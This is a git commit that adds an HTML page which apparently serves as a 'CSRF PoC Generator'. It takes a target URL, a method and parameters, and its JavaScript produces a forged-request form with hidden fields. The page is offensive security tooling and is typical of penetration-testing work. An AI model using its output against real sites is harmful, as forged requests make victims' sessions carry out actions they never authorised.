Create index.html
Muhammad Daffa
GitHub
parent
5e2b1fbedc
commit
28d8536e85
|
|
@ -0,0 +1,103 @@
|
|||
<!DOCTYPE HTML>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta http-equiv="content-type" content="text/html; charset=utf-8">
|
||||
<title>CSRF PoC Generator ~ MD15</title>
|
||||
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
|
||||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
|
||||
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="h1">CSRF PoC Generator</div>
|
||||
<form>
|
||||
<div class="form-group">
|
||||
<label for="URL">URL:</label>
|
||||
<input type="text" id="url" class="form-control" placeholder="http://sites.com"/>
|
||||
<small id="textHelp" class="form-text text-muted">Add http:// or https:// in the beginning</small>
|
||||
</div>
|
||||
|
||||
<div class="form-group">
|
||||
<label for="method">Method:</label>
|
||||
<select class="form-control" id="method">
|
||||
<option>GET</option>
|
||||
<option>POST</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label for="parameters">Parameters:</label>
|
||||
<input type="button" class="form-control" value="Add Parameters" id="add_param"></input>
|
||||
</div>
|
||||
|
||||
<div class="form-group">
|
||||
<div class="field_left">
|
||||
<input type="button" class="btn btn-primary" value="Generate" onclick="csrf_generator(true)" />
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="form-group">
|
||||
<label for="req">Results:</label>
|
||||
<textarea class="form-control" id="req" rows="15"></textarea>
|
||||
</form>
|
||||
</div>
|
||||
</div>
|
||||
<script>
|
||||
var param_counter = 0;
|
||||
|
||||
$(document).on("click", "#add_param", function(){
|
||||
|
||||
param_counter++;
|
||||
var fright = $(this).parent();
|
||||
fright.append("<form><div class='form-row'><div class='col'><input type='text' name='param[]' placeholder='Name' class='param_input form-control' id='param_input_"+param_counter+"'><input type='text' name='value[]' class='form-control' placeholder='Value'></div></form>");
|
||||
|
||||
});
|
||||
|
||||
|
||||
function csrf_generator(encode){
|
||||
encode = typeof(encode) == 'undefined' ? false : encode;
|
||||
|
||||
var html = "<html>\n<head>\n";
|
||||
html += ' <title>CSRF vulnerability in ' + encodeURI($$v('url')) + '</title>' + "\n";
|
||||
html += "</head>\n<body>\n";
|
||||
html += ' <form action="' + encodeURI($$v('url')) + '" method="' + encodeURI($$v('method')) + '">' + "\n";
|
||||
|
||||
|
||||
$(".param_input").each(function() {
|
||||
|
||||
if( $(this).val() )
|
||||
{
|
||||
html += ' <input type="hidden" name="' + encodeURI($(this).val()) + '" value="' + encodeURI($(this).next().val()) + '" />' + "\n";
|
||||
}
|
||||
});
|
||||
|
||||
html += " <input type='submit' value='Press Here' />\n";
|
||||
html += " </form>\n";
|
||||
html += "</body>\n";
|
||||
html += "</html>"
|
||||
|
||||
if (encode) {
|
||||
$$('req').innerHTML = html_encoding(html);
|
||||
}
|
||||
else {
|
||||
$$('poc').innerHTML = html;
|
||||
}
|
||||
}
|
||||
|
||||
function html_encoding(str) {
|
||||
return String(str)
|
||||
.replace(/&/g, '&')
|
||||
.replace(/"/g, '"')
|
||||
.replace(/'/g, ''')
|
||||
.replace(/</g, '<')
|
||||
.replace(/>/g, '>');
|
||||
}
|
||||
function $$v(id) {
|
||||
return document.getElementById(id).value;
|
||||
}
|
||||
function $$(id) {
|
||||
return document.getElementById(id);
|
||||
}
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
Loading…
Reference in New Issue